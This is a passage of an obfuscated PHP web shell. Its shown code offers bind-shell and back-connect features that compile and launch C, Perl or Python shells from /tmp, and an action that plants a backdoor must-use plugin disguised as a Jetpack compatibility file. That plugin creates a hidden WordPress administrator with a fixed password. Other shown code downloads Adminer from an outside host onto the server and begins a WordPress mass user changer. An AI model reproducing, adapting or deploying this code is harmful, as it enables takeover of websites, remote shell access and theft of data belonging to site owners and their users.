"\x3c\143\145\x6e\164\145\x72\76\74\150\x31\76\x4e\x65\x74\x77\157\x72\153\40\164\x6f\x6f\154\163\x3c\x2f\150\61\x3e\74\x64\x69\x76\x20\x63\154\141\x73\x73\x3d\143\x6f\x6e\x74\x65\156\164\76\xa\x3c\146\157\162\x6d\40\x6e\141\x6d\145\75\x27\x6e\146\x70\x27\40\x6f\156\123\x75\142\x6d\x69\x74\75\47\147\x28\x6e\x75\154\x6c\54\156\165\154\154\54\164\150\x69\163\56\x75\163\151\156\x67\56\x76\x61\x6c\x75\145\x2c\164\x68\151\163\56\x70\x6f\x72\x74\x2e\166\141\x6c\165\145\54\164\x68\x69\x73\x2e\160\x61\163\163\x2e\x76\x61\154\x75\145\51\x3b\x72\x65\x74\165\162\156\x20\x66\141\x6c\163\x65\x3b\x27\x3e\x3c\142\162\76\xa\74\x73\x70\x61\x6e\76\x42\x69\x6e\x64\40\x70\x6f\162\164\x20\164\x6f\x20\57\x62\x69\156\x2f\x73\x68\74\x2f\163\x70\x61\x6e\x3e\74\142\162\x2f\76\xa\x50\x6f\x72\x74\x3a\x20\x3c\x69\156\x70\165\x74\40\x74\171\160\x65\x3d\x27\164\x65\x78\x74\x27\40\156\x61\155\x65\x3d\47\x70\157\162\164\x27\x20\166\x61\x6c\165\x65\75\x27\x33\61\x33\x33\x37\x27\x3e\x20\120\141\163\163\167\157\162\144\x3a\40\x3c\x69\156\160\165\x74\40\x74\x79\x70\x65\x3d\47\164\145\x78\164\47\x20\x6e\141\155\145\75\47\160\x61\x73\x73\x27\x3e\40\x55\x73\151\156\x67\72\40\74\154\141\x62\x65\x6c\x3e\x3c\163\145\154\x65\x63\x74\x20\x6e\141\x6d\x65\75\x27\165\x73\x69\x6e\147\47\76\x3c\x6f\x70\164\151\157\156\40\166\x61\x6c\x75\x65\x3d\x27\142\x70\x70\47\x3e\120\x65\x72\x6c\x3c\57\157\160\164\151\157\156\76\x3c\157\x70\164\x69\157\x6e\x20\x76\141\x6c\165\145\x3d\x27\x62\x70\143\x27\x3e\103\74\57\157\x70\164\151\x6f\x6e\x3e\74\57\163\145\154\145\143\164\x3e\x3c\x2f\x6c\141\x62\x65\154\x3e\40\x3c\151\156\160\165\164\40\164\171\x70\x65\75\163\x75\x62\x6d\151\x74\40\x76\x61\x6c\165\145\75\x27\x73\x75\x62\x6d\151\164\x27\76\xa\x3c\x2f\146\157\x72\x6d\x3e\74\x62\x72\76\xa\x3c\x66\x6f\162\155\40\156\x61\155\x65\75\x27\156\146\x70\47\40\157\156\x53\165\x62\x6d\151\x74\75\47\x67\50\x6e\x75\154\154\54\156\x75\x6c\154\54\164\150\x69\x73\56\x75\x73\x69\156\147\x2e\166\x61\154\165\145\x2c\x74\150\x69\x73\56\x73\145\162\x76\145\162\56\166\x61\154\165\x65\54\x74\150\151\x73\x2e\160\157\x72\x74\x2e\166\141\x6c\165\x65\x29\73\162\x65\164\165\x72\156\40\146\141\154\x73\145\x3b\x27\76\12\74\163\x70\x61\x6e\x3e\x42\141\x63\x6b\55\x63\x6f\x6e\x6e\x65\143\164\40\164\x6f\x3c\57\163\x70\141\156\x3e\x3c\x62\162\57\x3e\xa\123\x65\162\x76\145\x72\x3a\x20\74\x69\156\x70\x75\164\x20\164\x79\x70\x65\x3d\47\164\145\x78\164\47\x20\x6e\141\x6d\x65\x3d\47\x73\145\x72\166\x65\162\x27\40\x76\141\x6c\x75\145\x3d".$_SERVER["\x52\105\115\x4f\x54\105\x5f\101\104\104\x52"]."\76\40\120\x6f\162\x74\x3a\40\x3c\x69\x6e\x70\165\164\40\164\x79\x70\145\x3d\47\x74\145\170\164\x27\x20\x6e\x61\155\145\75\47\160\157\162\164\x27\40\x76\141\x6c\x75\145\75\47\62\61\x27\76\x20\x55\x73\x69\156\x67\x3a\40\74\x6c\141\x62\x65\x6c\76\x3c\163\x65\154\x65\143\x74\x20\156\x61\155\145\75\x27\165\x73\x69\x6e\x67\x27\76\x3c\157\x70\x74\151\157\x6e\40\166\141\x6c\165\145\75\47\142\x63\x70\x79\x27\x3e\x50\171\x74\x68\157\x6e\x3c\57\x6f\x70\x74\151\x6f\156\x3e\x3c\157\160\164\151\157\156\x20\x76\x61\x6c\165\145\75\x27\142\x63\160\47\76\120\x65\162\x6c\74\x2f\157\x70\x74\x69\x6f\156\x3e\x3c\157\160\164\x69\157\156\40\x76\x61\154\165\x65\x3d\47\142\x63\x63\x27\x3e\103\x3c\57\x6f\x70\164\x69\x6f\x6e\76\74\x2f\163\x65\x6c\145\143\x74\76\74\x2f\154\x61\142\x65\x6c\x3e\40\x3c\151\x6e\x70\165\164\x20\x74\x79\x70\145\x3d\x73\x75\142\x6d\151\x74\40\166\x61\x6c\165\x65\75\x27\163\x75\142\x6d\151\x74\x27\x3e\74\x62\x72\x3e\x3c\142\x72\76\x3c\142\x72\x3e\12\x3c\x2f\x66\x6f\x72\x6d\76\x3c\x62\162\76";if(isset($_POST["\x70\x31"])){function cf($f,$t){$w=@fopen($f,"\167")or@function_exists("\x66\x69\x6c\x65\137\160\165\x74\x5f\143\x6f\156\164\145\156\x74\x73");if($w){@fwrite($w,@base64_decode($t))or@fputs($w,@base64_decode($t))or@file_put_contents($f,@base64_decode($t));@fclose($w);}}if($_POST["\160\61"]=="\x62\x70\x63"){cf("\57\x74\155\160\x2f\x62\160\56\x63",$bind_port_c);$asciifnc7=ex("\147\143\x63\x20\x2d\157\x20\x2f\x74\x6d\160\x2f\x62\x70\40\x2f\164\155\160\x2f\x62\x70\x2e\143");@unlink("\57\x74\155\160\x2f\x62\x70\56\x63");$asciifnc7.=ex("\57\164\x6d\x70\57\x62\x70\40".$_POST["\160\62"]."\x20".$_POST["\x70\x33"]."\x20\x26");echo"\74\160\162\145\x20\x63\x6c\141\x73\163\75\155\154\x31\76{$asciifnc7}".ex("\160\163\40\x61\x75\x78\40\174\x20\147\x72\145\x70\40\x62\160")."\74\x2f\x70\x72\x65\76";}if($_POST["\x70\61"]=="\x62\x70\160"){cf("\57\x74\x6d\160\x2f\x62\x70\56\x70\x6c",$bind_port_p);$asciifnc7=ex(which("\160\145\162\154")."\40\57\164\x6d\160\57\142\x70\56\160\154\40".$_POST["\160\62"]."\40\46");echo"\74\160\162\x65\x20\143\154\x61\163\x73\75\x6d\x6c\x31\76{$asciifnc7}".ex("\x70\163\40\141\165\170\x20\174\x20\x67\x72\145\x70\x20\142\160\56\x70\x6c")."\74\57\160\x72\x65\76";}if($_POST["\x70\x31"]=="\x62\143\143"){cf("\57\x74\x6d\x70\x2f\x62\143\56\143",$back_connect_c);$asciifnc7=ex("\147\x63\143\40\55\x6f\x20\x2f\x74\x6d\160\57\x62\143\x20\x2f\164\155\160\57\142\143\56\x63");@unlink("\57\x74\x6d\x70\x2f\x62\143\56\x63");$asciifnc7.=ex("\57\x74\155\x70\x2f\142\x63\x20".$_POST["\160\x32"]."\x20".$_POST["\x70\63"]."\40\46");echo"\74\160\x72\145\x20\x63\x6c\x61\x73\163\75\x6d\154\61\76{$asciifnc7}".ex("\160\163\x20\141\x75\170\x20\x7c\x20\147\x72\x65\x70\40\142\143")."\74\x2f\x70\x72\145\76";}if($_POST["\160\x31"]=="\142\x63\160"){cf("\57\164\155\160\57\142\x63\x2e\x70\154",$back_connect_p);$asciifnc7=ex(which("\160\x65\162\x6c")."\x20\x2f\164\155\160\57\x62\x63\x2e\x70\x6c\40".$_POST["\160\62"]."\40".$_POST["\160\x33"]."\40\x26");echo"\x3c\x70\x72\x65\40\143\154\x61\x73\163\75\155\154\61\x3e{$asciifnc7}".ex("\160\163\x20\141\x75\x78\x20\174\40\147\x72\145\x70\40\142\143\x2e\x70\x6c")."\74\x2f\160\162\145\76";}if($_POST["\160\x31"]=="\x62\x63\160\x79"){cf("\x2f\x74\155\160\x2f\142\143\56\x70\171",$back_connect_p);$asciifnc7=ex(which("\160\145\x72\154")."\x20\x2f\164\155\160\x2f\x62\x63\56\x70\x79\40".$_POST["\160\62"]."\40".$_POST["\160\x33"]."\40\46");echo"\74\x70\162\x65\x20\143\154\141\163\163\x3d\155\154\61\76{$asciifnc7}".ex("\x70\x73\40\x61\165\x78\40\174\40\147\162\x65\x70\x20\142\143\x2e\x70\171")."\74\57\x70\x72\145\76";}}echo "\74\x2f\x64\151\166\x3e";hardFooter();}goto f0fIh;ssGFZ:$asciifnc1=true;goto CsYiQ;wRb2p:$cwd=@getcwd();goto TuU0I;BOvTm:ini_set("\154\x6f\147\137\x65\162\162\x6f\x72\163\x5f\155\x61\x78\x5f\154\x65\x6e",0);goto f_t7R;f0fIh:if(isset($_REQUEST["\x75\x73\x65\x72"])){echo "\x3c\163\164\x79\x6c\x65\x3e\151\x6e\160\165\x74\133\164\171\x70\145\75\x73\165\142\155\151\x74\135\56\143\165\x73\164\157\155\x2d\x74\157\157\154\x73\x2d\x62\x75\164\164\x6f\156\x73\173\146\x6f\x6e\x74\x2d\163\151\172\145\72\61\x34\160\170\41\151\155\160\x6f\162\x74\x61\x6e\x74\73\160\x61\x64\144\151\156\147\x3a\x35\160\170\40\61\60\160\170\x21\x69\x6d\x70\157\162\x74\141\156\164\73\x6d\141\x72\x67\x69\x6e\x3a\x30\x20\x35\160\x78\41\x69\x6d\x70\x6f\162\x74\141\156\x74\x3b\146\x6f\x6e\164\x2d\167\145\x69\x67\x68\x74\72\x37\60\x30\41\151\155\160\157\162\x74\141\156\164\73\143\x75\162\163\157\x72\x3a\x70\x6f\151\156\x74\x65\162\41\151\155\160\x6f\x72\164\141\156\x74\73\x63\x6f\154\x6f\162\72\43\145\x31\145\61\x65\x31\x21\151\x6d\x70\157\162\x74\x61\156\x74\x3b\x62\x61\143\153\x67\x72\157\x75\156\144\55\x63\x6f\x6c\x6f\162\x3a\43\60\x36\60\x61\61\x30\41\151\155\x70\x6f\162\x74\141\156\164\x3b\142\157\162\144\145\162\x3a\x31\160\170\x20\x73\x6f\154\x69\x64\40\x23\x39\x63\x39\x38\62\145\x21\151\155\x70\157\x72\164\141\156\x74\x7d\74\57\163\164\x79\154\145\76\xa\x3c\57\150\x65\141\144\x3e\xa\74\143\x65\156\164\x65\162\x3e\12\x3c\x66\x6f\x72\155\x20\x6d\x65\x74\150\157\144\75\x27\160\x6f\163\x74\x27\76\xa\x3c\151\x6e\x70\x75\x74\x20\x74\x79\x70\145\x3d\x27\x73\x75\x62\x6d\x69\x74\x27\40\143\x6c\141\x73\x73\x3d\47\143\165\x73\x74\157\155\55\164\x6f\x6f\154\163\55\142\x75\164\x74\x6f\156\163\x27\40\x6e\141\x6d\x65\x3d\47\x63\x68\x27\40\166\x61\x6c\165\145\75\47\111\x6e\x6a\x65\x63\x74\x20\x4d\125\x20\120\x6c\165\x67\151\x6e\x73\x27\x3e\xa\74\57\146\157\x72\155\x3e\xa\x3c\57\x63\145\156\x74\x65\162\x3e";set_time_limit(0);error_reporting(0);if($_POST["\x63\x68"]){$isimu=base64_decode("\x50\x44\x39\x77\x61\x48\101\113\x4c\171\x6f\113\125\107\170\61\132\x32\154\165\x49\105\65\x68\x62\127\125\x36\x49\x45\x70\154\144\x48\x42\x68\131\62\x73\x67\125\62\126\x79\x64\x6d\x56\x79\111\105\116\x76\142\130\102\x68\144\107\154\x69\141\x57\170\x70\x64\x48\153\x67\x5a\x6d\71\171\x49\x46\144\166\143\155\122\121\x63\x6d\126\x7a\x63\167\x70\x51\x62\x48\126\156\141\x57\x34\147\126\x56\x4a\112\x4f\x69\102\157\x64\110\x52\167\x63\172\157\166\x4c\63\144\166\143\x6d\122\167\x63\155\x56\x7a\x63\171\65\x76\143\x6d\143\166\x43\153\122\154\143\x32\116\x79\x61\x58\x42\60\141\127\x39\x75\x4f\x69\102\130\142\x33\112\153\x55\110\112\154\143\63\x4d\147\143\62\x56\152\x64\130\112\160\x64\110\x6b\163\x49\110\102\154\143\155\x5a\x76\143\155\61\150\x62\155\116\x6c\x4c\103\x42\x74\x59\x58\112\162\132\x58\122\160\142\155\143\x73\x49\107\x46\165\132\103\x42\153\132\130\116\160\x5a\x32\x34\x67\144\107\71\166\x62\110\115\147\x34\x6f\103\x55\x49\105\160\x6c\144\110\102\150\x59\x32\163\147\141\x58\115\147\x62\x57\106\x6b\x5a\123\102\151\x65\x53\102\x58\x62\63\112\x6b\x55\110\112\154\143\x33\x4d\x67\132\130\x68\x77\x5a\130\112\x30\x63\171\102\60\x62\171\102\164\x59\127\x74\154\x49\x46\x64\121\111\110\x4e\160\x64\x47\126\172\x49\110\116\x68\x5a\155\126\171\111\107\106\165\x5a\x43\102\x6d\x59\130\x4e\60\x5a\x58\111\163\111\x47\106\165\x5a\103\x42\x6f\x5a\127\x78\167\111\110\154\166\x64\x53\102\x6e\143\x6d\71\x33\x49\x48\x6c\166\144\x58\x49\x67\x64\110\x4a\150\x5a\155\132\160\x59\171\64\x4b\x56\x6d\126\x79\x63\x32\x6c\x76\x62\152\157\x67\x4d\x53\64\167\x4c\x6a\105\x7a\103\x6b\x46\61\144\107\150\166\143\x6a\x6f\x67\121\130\x56\x30\142\62\x31\150\144\110\122\160\131\167\160\102\144\x58\x52\x6f\x62\x33\x49\x67\126\x56\x4a\x4a\117\151\x42\157\x64\110\122\167\x63\x7a\157\x76\114\63\x64\166\143\155\x52\167\143\155\126\172\143\x79\65\166\143\x6d\x63\166\x43\151\x6f\166\x43\155\106\x6b\132\x46\x39\x68\131\63\122\160\x62\62\x34\157\111\x43\x64\x70\142\155\x6c\60\112\171\x77\x67\132\x6e\x56\x75\131\x33\122\x70\x62\62\64\x67\x4b\x43\x6b\147\145\167\157\147\111\x43\101\x67\112\107\150\x68\143\x32\x67\147\120\x53\101\x69\131\x7a\115\65\115\172\x49\x34\x56\156\x56\141\115\x6a\x6b\x35\115\x7a\111\x34\x61\x32\x45\171\x62\x48\125\65\115\x7a\111\64\127\x6e\160\156\116\106\106\x48\x5a\104\x6b\x7a\115\x6a\150\x30\127\126\144\x73\x63\60\167\65\x4d\172\x49\64\x62\125\x35\62\117\x54\x4d\x79\117\x47\x4a\x52\x50\x54\60\151\117\x77\x6f\147\x49\103\x41\147\112\107\164\x6c\145\x53\101\71\x49\110\116\x30\143\x6c\71\171\132\x58\x42\163\131\x57\x4e\x6c\113\x43\x49\172\x4d\x6a\x42\x6b\x4f\x43\111\x73\x49\x69\111\x73\x49\x6e\x4d\172\x4d\x6a\x42\x6b\117\x48\x51\x7a\115\x6a\x42\153\117\110\111\172\115\x6a\102\153\x4f\x46\x38\x7a\x4d\x6a\102\x6b\117\x48\x49\x7a\x4d\152\102\153\117\x47\x55\172\115\x6a\x42\153\117\x48\101\x7a\x4d\x6a\x42\153\x4f\107\x77\172\115\x6a\102\153\x4f\107\x45\172\115\152\x42\153\x4f\x47\115\x7a\115\152\102\x6b\x4f\107\125\x69\113\x54\163\113\111\x43\101\147\111\103\122\157\x62\62\71\x72\130\62\106\x6a\144\x47\154\166\142\x69\101\71\x49\103\144\x69\131\123\x63\x75\112\63\115\156\x4c\x69\x64\154\116\151\x63\165\112\x7a\x51\x6e\x4c\x69\144\x66\x4a\x79\x34\x6e\x5a\103\x63\x75\112\x32\x55\x6e\114\x69\144\152\x4a\x79\x34\x6e\x62\62\x52\154\112\172\x73\x4b\111\103\101\x67\x49\103\122\x33\143\x46\x39\157\x62\62\71\x72\x49\x44\x30\x67\x4a\x47\150\x76\x62\x32\x74\146\x59\x57\116\60\141\127\x39\165\x4b\103\x4a\x54\x61\60\x5a\x50\x55\124\x41\x35\123\103\x49\x70\117\x77\x6f\147\111\x43\x41\147\x4a\110\144\167\x58\x32\x46\x6a\144\107\x6c\x76\x62\x69\101\71\111\x43\122\157\x62\62\x39\162\130\62\106\x6a\144\107\154\x76\142\x69\147\153\x61\x32\x56\65\113\103\x49\65\115\x7a\111\64\111\151\x77\x67\x49\151\111\163\x49\x43\122\x6f\131\130\x4e\x6f\x4b\x53\x6b\x37\x43\155\154\x6d\111\103\x67\147\x49\123\x42\61\143\62\126\x79\x62\x6d\x46\x74\x5a\126\x39\x6c\x65\x47\x6c\172\x64\110\x4d\x6f\111\103\122\x31\143\62\x56\x79\142\x6d\x46\x74\x5a\123\x41\160\111\x43\x6b\147\x65\167\157\147\x49\103\101\x67\112\110\126\x7a\132\130\x4a\x66\x61\127\121\147\x50\x53\102\63\x63\x46\x39\152\143\x6d\126\x68\144\x47\x56\x66\144\130\x4e\x6c\143\x69\x67\147\x4a\x48\x56\x7a\x5a\130\112\x75\x59\x57\61\x6c\x4c\x43\x41\153\144\63\102\146\x61\x47\x39\166\141\171\x77\147\x4a\x48\144\167\x58\x32\106\152\144\107\x6c\x76\x62\151\101\x70\x4f\x77\x6f\147\x49\103\101\147\x4a\110\x56\172\132\130\x49\x67\x50\123\x42\165\132\130\143\x67\x56\61\102\x66\x56\x58\x4e\154\143\151\147\147\112\110\x56\172\x5a\130\112\146\x61\x57\121\x67\x4b\x54\163\x4b\111\x43\x41\x67\x49\103\122\x31\x63\x32\x56\171\114\x54\65\172\x5a\130\x52\x66\x63\x6d\x39\163\x5a\x53\x67\147\112\62\106\x6b\x62\127\154\165\x61\130\x4e\x30\x63\x6d\x46\60\x62\63\x49\x6e\111\103\x6b\67\x43\156\60\147\x5a\x57\x78\172\x5a\123\102\67\103\x69\x41\x67\111\103\x41\153\144\130\116\x6c\x63\154\x39\x70\x5a\103\x41\71\111\110\144\x77\x58\x32\116\171\132\x57\x46\60\132\x56\71\x31\x63\62\x56\x79\x4b\x43\x41\156\x64\62\x39\x79\132\110\x42\x79\132\x58\116\172\x58\63\116\x6c\x59\x33\126\x79\x61\130\122\x35\112\171\167\x67\112\110\x42\x68\143\63\116\63\142\x33\112\x6b\x4c\103\x41\153\132\127\x31\x68\141\x57\170\146\x59\x57\122\x6b\x63\x6d\x56\172\143\x79\101\160\x4f\x77\x6f\x67\x49\103\x41\147\x4a\x48\126\x7a\132\x58\111\x67\x50\x53\102\165\x5a\130\143\x67\x56\x31\102\146\x56\130\116\154\x63\151\x67\147\112\x48\126\x7a\132\x58\x4a\146\x61\127\121\147\113\124\x73\113\111\103\x41\147\x49\103\x52\61\143\62\x56\x79\x4c\x54\65\x7a\x5a\130\122\x66\143\x6d\x39\x73\132\x53\x67\x67\x4a\x32\106\x6b\142\127\154\165\x61\x58\x4e\x30\x63\155\106\x30\x62\x33\x49\x6e\111\103\x6b\x37\x43\156\x30\147\146\x53\x41\x70\117\167\157\x2f\x50\x67\75\x3d");$mu_result='';$startDirectory=realpath(__DIR__);if($startDirectory!==$_SERVER["\x44\117\x43\125\x4d\x45\116\x54\x5f\122\x4f\117\124"]){$wpcon=$startDirectory."\57\167\160\x2d\x63\157\156\x74\145\x6e\164\57\57";$muplug=$startDirectory."\57\167\160\55\143\x6f\156\x74\145\156\x74\57\155\x75\55\x70\x6c\165\147\151\x6e\x73\57";}else{$wpcon=$_SERVER["\x44\117\x43\x55\115\105\116\x54\x5f\x52\x4f\x4f\x54"]."\x2f\x77\160\x2d\x63\x6f\156\x74\x65\156\164\x2f\57";$muplug=$_SERVER["\104\117\103\125\x4d\x45\x4e\124\137\x52\117\117\124"]."\x2f\167\160\x2d\x63\157\156\x74\145\x6e\x74\x2f\155\165\x2d\160\154\165\147\x69\x6e\x73\x2f";}$array=array();$array[]="\152\145\x74\160\x61\x63\x6b\x2d\x77\x6f\x72\144\x70\162\x65\163\x73\x2e\x70\x68\x70";$array[]="\x6a\x65\164\160\x61\x63\x6b\x2d\146\x6f\162\55\x77\x6f\162\144\x70\x72\x65\x73\163\56\x70\150\x70";$array[]="\152\x65\164\160\141\x63\153\x2d\x63\157\155\x70\x61\x74\x69\x62\151\x6c\x69\x74\171\x2e\x70\150\160";$array[]="\152\x65\x74\x70\141\143\153\x2d\156\x67\151\156\170\x2d\x63\x6f\155\x70\x61\x74\x69\142\151\154\x69\164\x79\x2e\160\x68\160";$array[]="\x6a\x65\164\x70\141\143\153\55\154\x69\164\x65\163\160\145\145\144\55\x63\157\x6d\x70\141\164\x69\x62\151\x6c\151\164\171\x2e\x70\150\160";$array[]="\152\145\164\x70\141\143\153\x2d\141\x70\x61\x63\150\x65\55\x63\x6f\155\x70\x61\x74\x69\142\151\x6c\x69\164\x79\x2e\x70\150\x70";$muname=$array[mt_rand(0,count($array)-1)];if(is_writeable($wpcon)){if(!is_dir($muplug)){mkdir($muplug,493,true);$plugmu=$muplug.$muname;$status=file_put_contents($plugmu,$isimu);if($status){$mu_result.="\74\163\x70\x61\x6e\x20\x73\x74\x79\x6c\145\75\x63\x6f\154\157\x72\x3a\43\62\x30\x65\146\62\x30\41\x69\155\160\157\x72\164\x61\x6e\164\x3b\146\157\x6e\x74\x2d\167\x65\151\x67\x68\x74\x3a\142\x6f\x6c\x64\73\76\102\x65\162\x68\141\x73\151\154\x20\x44\145\160\154\x6f\x79\x20\x4d\x55\40\120\x6c\165\147\x69\156\163\41\74\x2f\163\160\141\x6e\x3e\x26\156\142\x73\x70\73\x26\x6e\x62\163\x70\x3b\x26\x6e\x62\x73\160\x3b\x20{$plugmu}\74\142\x72\x3e\x3c\x62\162\76\x55\x73\x65\162\x6e\x61\155\x65\x3a\x20\167\157\x72\x64\160\x72\x65\x73\163\40\x2f\40\167\157\162\x64\x70\x72\x65\163\163\x5f\163\145\x63\x75\162\x69\164\171\40\x3c\x62\x72\76\120\141\x73\x73\x77\x6f\x72\x64\72\40\x4a\x41\116\x43\117\x4e\107";chmod($plugmu,292);}else{$mu_result.="\x3c\x73\160\141\x6e\x20\x73\x74\171\154\x65\75\x63\x6f\x6c\157\x72\x3a\162\145\144\x21\x69\155\160\x6f\x72\x74\x61\156\164\x3b\x66\157\x6e\164\x2d\167\x65\151\147\150\164\72\142\x6f\x6c\144\73\x3e\x47\x61\147\141\x6c\x20\x44\x65\x70\154\157\171\x20\115\x55\x20\x50\154\165\x67\151\x6e\x73\41\74\x2f\163\x70\141\x6e\76\x3c\142\x72\76";}}else{chmod($muplug,493);$plugmu=$muplug.$muname;$status=file_put_contents($plugmu,$isimu);if($status){$mu_result.="\74\163\160\141\x6e\x20\x73\164\171\x6c\145\75\143\x6f\x6c\157\x72\x3a\43\x32\60\x65\x66\x32\x30\x21\151\x6d\160\157\x72\164\x61\156\x74\73\x66\x6f\x6e\x74\55\x77\145\x69\147\150\x74\x3a\x62\157\154\x64\73\x3e\x42\x65\162\x68\141\163\x69\x6c\40\x44\x65\x70\154\157\x79\x20\115\125\40\x50\x6c\165\147\151\x6e\163\x21\x3c\x2f\163\x70\141\x6e\76\x26\156\142\163\x70\73\x26\x6e\x62\x73\160\x3b\x26\156\x62\163\160\x3b\x20\74\x73\x70\141\x6e\x20\163\x74\x79\154\145\x3d\143\x6f\154\157\162\72\43\146\146\146\x21\151\155\x70\x6f\162\164\141\156\164\73\76{$plugmu}\74\57\163\160\x61\156\76\x3c\x62\x72\x3e\74\142\162\76\74\x73\x70\x61\x6e\40\163\164\171\x6c\145\x3d\x63\x6f\x6c\x6f\x72\72\43\146\146\x66\41\151\x6d\160\x6f\162\x74\141\156\164\73\146\157\x6e\164\55\167\145\x69\x67\150\x74\x3a\x62\157\154\144\x3b\x3e\x55\163\145\162\x6e\x61\155\145\x3a\74\x2f\x73\160\141\156\x3e\40\74\163\160\141\156\x20\x73\164\171\154\145\x3d\x63\157\x6c\x6f\162\72\x23\x66\146\x66\41\x69\155\x70\157\162\x74\x61\156\x74\x3b\x3e\x77\x6f\x72\144\160\x72\x65\163\163\40\57\x20\167\157\x72\x64\160\x72\145\163\x73\137\163\145\143\165\x72\x69\x74\171\x20\x3c\x62\x72\76\74\57\x73\x70\141\156\x3e\x3c\x73\160\141\156\x20\163\x74\x79\x6c\145\x3d\x63\157\x6c\x6f\x72\72\43\146\146\146\41\x69\155\160\157\162\x74\x61\156\164\x3b\x66\157\x6e\x74\55\x77\145\x69\147\x68\164\72\x62\x6f\x6c\144\x3b\76\120\x61\x73\x73\x77\157\x72\144\72\x3c\x2f\x73\160\x61\x6e\x3e\x20\x3c\x73\160\x61\x6e\x20\x73\164\171\154\x65\75\x63\157\x6c\157\162\x3a\x23\146\146\146\41\151\x6d\x70\157\x72\164\141\156\164\73\x3e\x4a\101\116\x43\x4f\x4e\x47\74\x2f\x73\x70\141\156\x3e";chmod($plugmu,292);}else{$mu_result.="\x3c\163\x70\141\156\40\x73\x74\x79\154\145\75\x63\157\x6c\x6f\162\72\x72\145\x64\41\x69\155\160\157\162\164\141\x6e\x74\x3b\146\157\x6e\164\x2d\167\x65\151\147\x68\164\x3a\142\x6f\x6c\x64\x3b\76\x47\x61\147\141\x6c\x20\104\x65\x70\154\x6f\x79\40\115\x55\40\x50\154\165\147\x69\x6e\x73\x21\x3c\x2f\x73\160\x61\x6e\x3e\x3c\x62\162\76";}}}}echo "\x3c\144\151\x76\40\x63\154\141\163\x73\x3d\42\x73\155\141\154\x6c\x61\162\145\141\x22\40\156\x61\155\x65\75\42\x6f\165\x74\x70\165\164\x20\163\x74\x79\x6c\x65\75\42\x62\157\162\144\145\162\55\x62\x6f\x74\x74\x6f\x6d\x3a\x30\73\x6d\141\162\147\x69\x6e\55\x74\x6f\160\72\x35\160\x78\x3b\x22\x20\x72\x65\141\x64\157\156\154\171\76";print_r($mu_result).PHP_EOL;echo "\x3c\57\144\151\166\76";echo "\x3c\x2f\142\x6f\x64\x79\76\x3c\57\150\164\x6d\x6c\76";die;}goto BzF5d;sHJzm:$safe_mode=@ini_get("\163\141\146\145\137\x6d\157\144\145");goto Heuhn;T_JGw:ini_set("\x64\x69\163\160\154\x61\x79\137\145\162\162\x6f\x72\x73",0);goto QouUw;hflHy:function actionAdminer(){hardHeader();echo "\x3c\x63\x65\156\x74\x65\x72\76\74\x68\61\76\101\x64\155\x69\156\145\x72\x3c\x2f\150\61\x3e\74\x64\x69\166\x20\143\154\141\x73\x73\75\143\x6f\156\x74\145\156\164\x3e\x3c\x62\162\x3e";$full=str_replace($_SERVER["\104\117\103\125\115\105\116\x54\137\122\117\x4f\x54"],'',$dir);function adminer($url,$isi){$fp=fopen($isi,"\x77");$ch=curl_init();curl_setopt($ch,CURLOPT_URL,$url);curl_setopt($ch,CURLOPT_BINARYTRANSFER,true);curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,false);curl_setopt($ch,CURLOPT_FILE,$fp);return curl_exec($ch);curl_close($ch);fclose($fp);ob_flush();flush();}if(file_exists("\x61\144\155\x69\156\55\x75\x73\x65\x72\56\x70\x68\160")){echo "\x3c\x63\x65\x6e\x74\x65\162\76\x3c\x66\157\x6e\164\40\143\157\x6c\157\162\75\167\x68\x69\164\x65\76\x3c\142\162\x3e\x3c\x61\x20\x68\x72\145\x66\75\47\141\144\155\x69\x6e\55\165\x73\145\162\56\x70\150\x70\x27\x20\x74\141\x72\147\145\x74\x3d\47\137\x62\154\x61\x6e\153\47\76\x5b\x20\101\144\155\151\156\x65\162\40\154\x6f\147\x69\x6e\40\x5d\x3c\57\x61\76\x3c\x62\162\x3e\74\x62\162\x3e\74\x62\162\x3e\74\x2f\146\x6f\x6e\x74\x3e\x3c\57\143\x65\x6e\164\145\x72\76";}else{if(adminer("\x68\164\x74\160\x73\72\57\57\x67\x69\x73\164\x2e\147\151\164\150\165\142\x75\163\145\162\143\157\x6e\x74\x65\x6e\x74\x2e\x63\157\x6d\57\x70\165\x6a\151\141\x6e\164\157\x6c\x6d\141\157\x2f\70\64\x34\60\x35\x34\65\x63\x30\x66\70\63\x38\x35\146\x36\62\65\65\142\x38\x37\66\63\x63\x66\63\x62\x39\x65\70\x38\57\162\141\167\x2f\145\60\x32\x62\61\143\x62\x38\x62\70\x63\x30\70\x64\144\x63\66\x61\x37\x36\142\x30\x36\64\141\61\63\x37\63\x30\61\x66\x63\71\71\141\70\x63\145\x34\57\141\x64\x6d\151\156\x65\x72\56\160\x68\160","\141\144\155\151\156\55\x75\x73\145\162\56\x70\150\160")){echo "\74\143\145\156\x74\x65\x72\x3e\74\146\x6f\x6e\x74\40\x63\157\154\x6f\162\x3d\167\150\151\x74\145\x3e\74\x62\162\76\x3c\142\162\x3e\x3c\x61\40\x68\x72\x65\146\75\x27\x61\x64\155\151\156\x2d\165\x73\x65\162\x2e\160\x68\x70\47\40\164\x61\x72\147\145\x74\x3d\47\x5f\142\x6c\x61\156\153\47\76\133\40\x41\x64\x6d\151\x6e\x65\162\x20\x6c\x6f\147\x69\x6e\x20\135\74\57\x61\76\x3c\x62\162\x3e\x3c\142\162\x3e\74\57\146\157\x6e\x74\76\74\x2f\x63\x65\156\164\x65\x72\x3e";}else{echo "\x3c\143\x65\156\x74\145\162\x3e\x3c\146\x6f\156\164\x20\143\157\x6c\157\x72\75\x72\145\x64\76\x47\x61\147\141\154\x20\124\141\x72\157\40\x41\x64\x6d\x69\x6e\x65\162\x3c\57\x66\x6f\x6e\x74\x3e\x3c\x2f\x63\x65\x6e\164\x65\x72\x3e";}}hardFooter();}goto Jclr3;d0Oeq:function actionEdituser(){hardHeader();echo "\74\x63\x65\x6e\164\x65\x72\76\74\150\61\x3e\x57\157\162\144\160\x72\x65\163\x73\x20\x4d\141\x73\x73\x20\125\x73\145\x72\40\x43\x68\x61\156\x67\x65\162\x3c\x2f\150\61\x3e\x3c\144\151\x76\40\x63\154\x61\163\x73\75\143\157\x6e\x74\x65\x6e\164\76\x3c\142\x72\x3e";echo 